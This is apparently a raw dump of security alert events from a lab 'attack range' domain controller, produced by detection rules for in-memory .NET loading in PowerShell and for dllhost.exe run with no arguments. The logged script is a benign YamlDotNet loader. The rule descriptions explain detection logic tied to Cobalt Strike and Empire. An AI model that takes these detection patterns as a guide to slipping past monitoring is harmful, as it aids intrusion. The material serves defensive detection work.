[Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T18:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T18:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664740532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T18:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T18:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664733600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664733600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="3156", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664733600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664733600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0xc54", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664736933, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T17:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T17:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664736933, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T17:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T17:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664736933, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T17:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T17:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664736933, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T17:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T17:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664730000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664730000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", 